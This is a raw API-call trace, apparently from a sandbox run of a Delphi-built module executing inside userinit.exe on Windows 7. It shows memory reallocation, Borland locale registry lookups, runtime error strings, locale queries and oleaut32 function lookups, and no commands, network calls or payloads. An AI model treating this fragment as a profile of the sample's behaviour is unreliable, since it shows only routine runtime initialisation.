[0201.241] GlobalUnlock (hMem=0x58000c) returned 0
[0201.241] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc6000, uFlags=0x2) returned 0x58000c
[0201.293] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.294] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.294] GlobalUnlock (hMem=0x58000c) returned 0
[0201.294] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc8000, uFlags=0x2) returned 0x58000c
[0201.311] GlobalLock (hMem=0x58000c) returned 0x27f0020
[0201.312] GlobalHandle (pMem=0x27f0020) returned 0x58000c
[0201.313] GlobalUnlock (hMem=0x58000c) returned 0
[0201.313] GlobalReAlloc (hMem=0x58000c, dwBytes=0xca000, uFlags=0x2) returned 0x58000c
[0201.400] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.401] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.401] GlobalUnlock (hMem=0x58000c) returned 0
[0201.401] GlobalReAlloc (hMem=0x58000c, dwBytes=0xcc000, uFlags=0x2) returned 0x58000c
[0201.415] GlobalLock (hMem=0x58000c) returned 0x27f0020
[0201.416] GlobalHandle (pMem=0x27f0020) returned 0x58000c
[0201.416] GlobalUnlock (hMem=0x58000c) returned 0
[0201.416] GlobalReAlloc (hMem=0x58000c, dwBytes=0xce000, uFlags=0x2) returned 0x58000c
[0201.429] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.430] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.430] GlobalUnlock (hMem=0x58000c) returned 0
[0201.430] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd0000, uFlags=0x2) returned 0x58000c
[0201.445] GlobalLock (hMem=0x58000c) returned 0x27f0020
[0201.446] GlobalHandle (pMem=0x27f0020) returned 0x58000c
[0201.446] GlobalUnlock (hMem=0x58000c) returned 0
[0201.446] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd2000, uFlags=0x2) returned 0x58000c
[0201.460] GlobalLock (hMem=0x58000c) returned 0x28d0020
[0201.461] GlobalHandle (pMem=0x28d0020) returned 0x58000c
[0201.461] GlobalUnlock (hMem=0x58000c) returned 0
[0201.461] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd4000, uFlags=0x2) returned 0x58000c
[0201.475] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.476] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.476] GlobalUnlock (hMem=0x58000c) returned 0
[0201.476] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd6000, uFlags=0x2) returned 0x58000c
[0201.501] GlobalLock (hMem=0x58000c) returned 0x2800020
[0201.502] GlobalHandle (pMem=0x2800020) returned 0x58000c
[0201.502] GlobalUnlock (hMem=0x58000c) returned 0
[0201.502] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd8000, uFlags=0x2) returned 0x58000c
[0201.516] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.517] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.517] GlobalUnlock (hMem=0x58000c) returned 0
[0201.517] GlobalReAlloc (hMem=0x58000c, dwBytes=0xda000, uFlags=0x2) returned 0x58000c
[0201.533] GlobalLock (hMem=0x58000c) returned 0x2800020
[0201.534] GlobalHandle (pMem=0x2800020) returned 0x58000c
[0201.534] GlobalUnlock (hMem=0x58000c) returned 0
[0201.534] GlobalReAlloc (hMem=0x58000c, dwBytes=0xdc000, uFlags=0x2) returned 0x58000c
[0201.549] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.549] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.550] GlobalUnlock (hMem=0x58000c) returned 0
[0201.550] GlobalReAlloc (hMem=0x58000c, dwBytes=0xde000, uFlags=0x2) returned 0x58000c
[0201.564] GlobalLock (hMem=0x58000c) returned 0x2800020
[0201.565] GlobalHandle (pMem=0x2800020) returned 0x58000c
[0201.565] GlobalUnlock (hMem=0x58000c) returned 0
[0201.565] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe0000, uFlags=0x2) returned 0x58000c
[0201.580] GlobalLock (hMem=0x58000c) returned 0x28e0020
[0201.581] GlobalHandle (pMem=0x28e0020) returned 0x58000c
[0201.581] GlobalUnlock (hMem=0x58000c) returned 0
[0201.581] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe2000, uFlags=0x2) returned 0x58000c
[0201.596] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.597] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.597] GlobalUnlock (hMem=0x58000c) returned 0
[0201.597] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe4000, uFlags=0x2) returned 0x58000c
[0201.613] GlobalLock (hMem=0x58000c) returned 0x2810020
[0201.613] GlobalHandle (pMem=0x2810020) returned 0x58000c
[0201.613] GlobalUnlock (hMem=0x58000c) returned 0
[0201.614] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe6000, uFlags=0x2) returned 0x58000c
[0201.631] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.632] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.632] GlobalUnlock (hMem=0x58000c) returned 0
[0201.632] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe8000, uFlags=0x2) returned 0x58000c
[0201.647] GlobalLock (hMem=0x58000c) returned 0x2810020
[0201.648] GlobalHandle (pMem=0x2810020) returned 0x58000c
[0201.648] GlobalUnlock (hMem=0x58000c) returned 0
[0201.648] GlobalReAlloc (hMem=0x58000c, dwBytes=0xea000, uFlags=0x2) returned 0x58000c
[0201.664] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.665] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.665] GlobalUnlock (hMem=0x58000c) returned 0
[0201.665] GlobalReAlloc (hMem=0x58000c, dwBytes=0xec000, uFlags=0x2) returned 0x58000c
[0201.680] GlobalLock (hMem=0x58000c) returned 0x2810020
[0201.681] GlobalHandle (pMem=0x2810020) returned 0x58000c
[0201.681] GlobalUnlock (hMem=0x58000c) returned 0
[0201.681] GlobalReAlloc (hMem=0x58000c, dwBytes=0xee000, uFlags=0x2) returned 0x58000c
[0201.697] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.698] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.698] GlobalUnlock (hMem=0x58000c) returned 0
[0201.698] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf0000, uFlags=0x2) returned 0x58000c
[0201.714] GlobalLock (hMem=0x58000c) returned 0x2810020
[0201.714] GlobalHandle (pMem=0x2810020) returned 0x58000c
[0201.714] GlobalUnlock (hMem=0x58000c) returned 0
[0201.715] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf2000, uFlags=0x2) returned 0x58000c
[0201.730] GlobalLock (hMem=0x58000c) returned 0x2910020
[0201.731] GlobalHandle (pMem=0x2910020) returned 0x58000c
[0201.731] GlobalUnlock (hMem=0x58000c) returned 0
[0201.731] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf4000, uFlags=0x2) returned 0x58000c
[0201.748] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.750] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.750] GlobalUnlock (hMem=0x58000c) returned 0
[0201.750] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf6000, uFlags=0x2) returned 0x58000c
[0201.766] GlobalLock (hMem=0x58000c) returned 0x2820020
[0201.767] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0201.767] GlobalUnlock (hMem=0x58000c) returned 0
[0201.767] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf8000, uFlags=0x2) returned 0x58000c
[0201.784] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.785] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.785] GlobalUnlock (hMem=0x58000c) returned 0
[0201.785] GlobalReAlloc (hMem=0x58000c, dwBytes=0xfa000, uFlags=0x2) returned 0x58000c
[0201.801] GlobalLock (hMem=0x58000c) returned 0x2820020
[0201.802] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0201.802] GlobalUnlock (hMem=0x58000c) returned 0
[0201.802] GlobalReAlloc (hMem=0x58000c, dwBytes=0xfc000, uFlags=0x2) returned 0x58000c
[0201.819] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.820] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.820] GlobalUnlock (hMem=0x58000c) returned 0
[0201.820] GlobalReAlloc (hMem=0x58000c, dwBytes=0xfe000, uFlags=0x2) returned 0x58000c
[0201.836] GlobalLock (hMem=0x58000c) returned 0x2820020
[0201.837] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0201.837] GlobalUnlock (hMem=0x58000c) returned 0
[0201.837] GlobalReAlloc (hMem=0x58000c, dwBytes=0x100000, uFlags=0x2) returned 0x58000c
[0201.854] GlobalLock (hMem=0x58000c) returned 0x2920020
[0201.855] GlobalHandle (pMem=0x2920020) returned 0x58000c
[0201.855] GlobalUnlock (hMem=0x58000c) returned 0
[0201.855] GlobalReAlloc (hMem=0x58000c, dwBytes=0x102000, uFlags=0x2) returned 0x58000c
[0201.873] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.874] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.874] GlobalUnlock (hMem=0x58000c) returned 0
[0201.874] GlobalReAlloc (hMem=0x58000c, dwBytes=0x104000, uFlags=0x2) returned 0x58000c
[0201.890] GlobalLock (hMem=0x58000c) returned 0x2830020
[0201.891] GlobalHandle (pMem=0x2830020) returned 0x58000c
[0201.891] GlobalUnlock (hMem=0x58000c) returned 0
[0201.891] GlobalReAlloc (hMem=0x58000c, dwBytes=0x106000, uFlags=0x2) returned 0x58000c
[0201.909] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.910] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.910] GlobalUnlock (hMem=0x58000c) returned 0
[0201.910] GlobalReAlloc (hMem=0x58000c, dwBytes=0x108000, uFlags=0x2) returned 0x58000c
[0201.927] GlobalLock (hMem=0x58000c) returned 0x2830020
[0201.928] GlobalHandle (pMem=0x2830020) returned 0x58000c
[0201.928] GlobalUnlock (hMem=0x58000c) returned 0
[0201.928] GlobalReAlloc (hMem=0x58000c, dwBytes=0x10a000, uFlags=0x2) returned 0x58000c
[0201.947] GlobalLock (hMem=0x58000c) returned 0x2720020
[0201.948] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0201.948] GlobalUnlock (hMem=0x58000c) returned 0
[0201.948] GlobalReAlloc (hMem=0x58000c, dwBytes=0x10c000, uFlags=0x2) returned 0x58000c
[0201.973] GlobalLock (hMem=0x58000c) returned 0x2830020
[0201.974] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2720000
[0201.974] VirtualAlloc (lpAddress=0x2720000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2720000
[0202.004] GetKeyboardType (nTypeFlag=0) returned 4
[0202.004] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0202.004] GetStartupInfoA (in: lpStartupInfo=0x10f608 | out: lpStartupInfo=0x10f608*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0202.004] GetVersion () returned 0x1db10106
[0202.004] GetVersion () returned 0x1db10106
[0202.004] GetCurrentThreadId () returned 0x8d8
[0202.005] GetModuleFileNameA (in: hModule=0x2940000, lpFilename=0x10f104, nSize=0x105 | out: lpFilename="\x14ñ\x10" (normalized: "c:\\windows\\system32\\\x14ñ\x10")) returned 0x0
[0202.005] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x10efdf, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0202.005] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x10f0f4 | out: phkResult=0x10f0f4*=0x0) returned 0x2
[0202.005] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x10f0f4 | out: phkResult=0x10f0f4*=0x0) returned 0x2
[0202.005] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x10f0f4 | out: phkResult=0x10f0f4*=0x0) returned 0x2
[0202.005] lstrcpynA (in: lpString1=0x10efdf, lpString2="\x14ñ\x10", iMaxLength=261 | out: lpString1="\x14ñ\x10") returned="\x14ñ\x10"
[0202.005] GetThreadLocale () returned 0x409
[0202.005] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x10f0ef, cchData=5 | out: lpLCData="ENU") returned 4
[0202.005] lstrlenA (lpString="\x14ñ\x10") returned 3
[0202.005] LoadStringA (in: hInstance=0x2940000, uID=0xffc4, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0202.005] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x13dcc0
[0202.005] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a60000
[0202.005] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x13ecc0
[0202.005] VirtualAlloc (lpAddress=0x2a60000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a60000
[0202.005] LoadStringA (in: hInstance=0x2940000, uID=0xffc3, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0202.005] LoadStringA (in: hInstance=0x2940000, uID=0xffc1, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffc2, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffd4, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffdd, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffd3, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffd0, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffd7, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffd6, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffe8, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffe9, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffea, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffe7, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffe5, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffe3, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffe2, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffe1, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffe0, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffff, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfffe, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfffd, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfffc, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfffb, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfffa, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfff9, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfff8, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfff7, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfff6, lpBuffer=0x10f228, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xfff4, lpBuffer=0x10f214, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0202.006] LoadStringA (in: hInstance=0x2940000, uID=0xffe4, lpBuffer=0x10f214, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0202.006] GetVersionExA (in: lpVersionInformation=0x10f5ac*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2940000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x94\x02·\"\x94\x02Dö\x10") | out: lpVersionInformation=0x10f5ac*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0202.006] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0202.006] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0202.006] GetThreadLocale () returned 0x409
[0202.006] GetThreadLocale () returned 0x409
[0202.006] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x10f484, cchData=256 | out: lpLCData="Jan") returned 4
[0202.006] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x10f484, cchData=256 | out: lpLCData="January") returned 8
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x10f484, cchData=256 | out: lpLCData="Feb") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x10f484, cchData=256 | out: lpLCData="February") returned 9
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x10f484, cchData=256 | out: lpLCData="Mar") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x10f484, cchData=256 | out: lpLCData="March") returned 6
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x10f484, cchData=256 | out: lpLCData="Apr") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x10f484, cchData=256 | out: lpLCData="April") returned 6
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x10f484, cchData=256 | out: lpLCData="May") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x10f484, cchData=256 | out: lpLCData="May") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x10f484, cchData=256 | out: lpLCData="Jun") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x10f484, cchData=256 | out: lpLCData="June") returned 5
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x10f484, cchData=256 | out: lpLCData="Jul") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x10f484, cchData=256 | out: lpLCData="July") returned 5
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x10f484, cchData=256 | out: lpLCData="Aug") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x10f484, cchData=256 | out: lpLCData="August") returned 7
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x10f484, cchData=256 | out: lpLCData="Sep") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x10f484, cchData=256 | out: lpLCData="September") returned 10
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x10f484, cchData=256 | out: lpLCData="Oct") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x10f484, cchData=256 | out: lpLCData="October") returned 8
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x10f484, cchData=256 | out: lpLCData="Nov") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x10f484, cchData=256 | out: lpLCData="November") returned 9
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x10f484, cchData=256 | out: lpLCData="Dec") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x10f484, cchData=256 | out: lpLCData="December") returned 9
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x10f484, cchData=256 | out: lpLCData="Sun") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x10f484, cchData=256 | out: lpLCData="Sunday") returned 7
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x10f484, cchData=256 | out: lpLCData="Mon") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x10f484, cchData=256 | out: lpLCData="Monday") returned 7
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x10f484, cchData=256 | out: lpLCData="Tue") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x10f484, cchData=256 | out: lpLCData="Tuesday") returned 8
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x10f484, cchData=256 | out: lpLCData="Wed") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x10f484, cchData=256 | out: lpLCData="Wednesday") returned 10
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x10f484, cchData=256 | out: lpLCData="Thu") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x10f484, cchData=256 | out: lpLCData="Thursday") returned 9
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x10f484, cchData=256 | out: lpLCData="Fri") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x10f484, cchData=256 | out: lpLCData="Friday") returned 7
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x10f484, cchData=256 | out: lpLCData="Sat") returned 4
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x10f484, cchData=256 | out: lpLCData="Saturday") returned 9
[0202.007] GetThreadLocale () returned 0x409
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="$") returned 2
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="0") returned 2
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="0") returned 2
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x10f5d8, cchData=2 | out: lpLCData=",") returned 2
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x10f5d8, cchData=2 | out: lpLCData=".") returned 2
[0202.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="2") returned 2
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x10f5d8, cchData=2 | out: lpLCData="/") returned 2
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0202.008] GetThreadLocale () returned 0x409
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x10f4ac, cchData=256 | out: lpLCData="1") returned 2
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0202.008] GetThreadLocale () returned 0x409
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x10f4ac, cchData=256 | out: lpLCData="1") returned 2
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x10f5d8, cchData=2 | out: lpLCData=":") returned 2
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="AM") returned 3
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="PM") returned 3
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="0") returned 2
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="0") returned 2
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x10f4e0, cchData=256 | out: lpLCData="0") returned 2
[0202.008] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x10f5d8, cchData=2 | out: lpLCData=",") returned 2
[0202.008] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0202.008] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0202.008] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0202.008] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0202.008] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0202.008] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0202.008] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0202.009] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0202.010] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
